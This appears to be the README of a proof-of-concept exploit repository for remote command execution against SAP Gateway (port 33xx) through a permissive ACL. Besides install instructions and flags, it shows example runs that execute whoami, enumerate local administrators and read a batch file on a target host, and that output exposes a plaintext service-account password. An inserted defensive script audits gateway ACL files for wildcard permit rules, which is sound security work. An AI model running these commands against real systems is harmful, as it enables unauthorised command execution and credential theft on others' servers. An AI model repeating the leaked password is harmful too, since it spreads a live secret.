SAP Gateway RCE
This PoC exploits an ACL misconfiguration in the SAP Gateway (port 33xx) that leads to a Remote Command Execution (RCE).
SAPanonGWv1.py is the first version of the exploit, based on raw packets sent. It does not require any additional modules (Run and Pwn!).
SAPanonGWv2.py is the second version of the exploit, based on the pysap library.
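The misconfiguration this PoC relies on is the gateway's access control list being too permissive. The following audit script is an added example and is not part of this repository: it parses the version-2 rule syntax used by the SAP Gateway ACL files (secinfo / reginfo, one `P` permit or `D` deny rule per line with `KEY=VALUE` pairs and `*` as wildcard) and reports permit rules that leave the program (`TP`), caller host (`HOST`) or user host (`USER-HOST`) wide open. The sample file contents, the rule numbers and the choice to treat a missing field as open are assumptions made for the example; check them against the SAP documentation for your release before relying on the result.

```python
"""Audit SAP Gateway ACL files (secinfo / reginfo) for permissive entries.

Added example, not part of the SAPanonGW PoC. It assumes the version-2 ACL
syntax: one rule per line, `P` (permit) or `D` (deny), followed by KEY=VALUE
pairs such as TP, USER, HOST and USER-HOST, with `*` as a wildcard.
The sample file below is constructed for illustration only.
"""
import re

# Constructed sample: one fully open permit rule, two scoped rules, a final deny.
SAMPLE_SECINFO = """#VERSION=2
P TP=* USER=* HOST=* USER-HOST=*
P TP=sapxpg USER=* HOST=internal USER-HOST=internal
P TP=/usr/sap/PRD/backup.sh USER=prdadm HOST=sapapp01 USER-HOST=sapapp01
D TP=* USER=* HOST=*
"""

KEY_VALUE = re.compile(r"([A-Z\-]+)=(\S+)")

# Fields that, when wildcarded together in a permit rule, let any client on
# any host start any program through the gateway.
RISKY_FIELDS = ("TP", "HOST", "USER-HOST")


def parse_acl(text):
    """Return a list of (action, fields) tuples, skipping comments and blank lines."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        action, _, rest = line.partition(" ")
        if action not in ("P", "D"):
            continue  # unknown line type; ignore rather than guess
        fields = dict(KEY_VALUE.findall(rest))
        rules.append((action, fields))
    return rules


def is_open(value):
    """A `*` value is a wildcard; a missing field is treated as open (assumption)."""
    return value is None or value == "*"


def find_permissive(text):
    """Return (rule_no, TP, open_fields) for permit rules that wildcard a risky field."""
    findings = []
    for rule_no, (action, fields) in enumerate(parse_acl(text), 1):
        if action != "P":
            continue
        open_fields = [f for f in RISKY_FIELDS if is_open(fields.get(f))]
        if open_fields:
            findings.append((rule_no, fields.get("TP", "*"), open_fields))
    return findings


if __name__ == "__main__":
    for rule_no, tp, open_fields in find_permissive(SAMPLE_SECINFO):
        print("rule %d (TP=%s) is permissive: open fields %s"
              % (rule_no, tp, ", ".join(open_fields)))
```

Run it against the real secinfo and reginfo files of each instance (replace `SAMPLE_SECINFO` with the file contents); any permit rule reported here should be narrowed to the specific programs and hosts that actually need gateway access, and the gateway should be configured to enforce the ACL files rather than fall back to an open default.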
Installation
git clone https://github.com/chipik/SAP_GW_RCE_exploit.git
Usage
python2 SAPanonGWv1.py
Flags
-t TARGET
-p PORT
-c CMD
-v VERBOSE
-o OUTPUT
Examples
WhoAmI
$ python2 SAPanonGWv1.py -t 10.10.10.10 -p 3300 -c whoami
[*] sending cmd:whoami
saphost\sapserviceadm
Local Administrators Group
$ python2 SAPanonGWv1.py -t 10.10.10.10 -p 3300 -c "net localgroup administrators"
[*] sending cmd:net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
admlocal
crypt0rr
The command completed successfully.
Files via PowerShell
$ python2 SAPanonGWv1.py -t 10.10.10.10 -p 3300 -c "powershell.exe -c type c:\SAP\stop_sap.bat"
[*] sending cmd:powershell.exe -c type c:\SAP\Stop_sap.bat
@Echo ATTENTION - YOU ARE GOING TO STOP SAP
PAUSE
sapcontrol -nr 00 -user sapserviceadm Welkom1234! -function Stop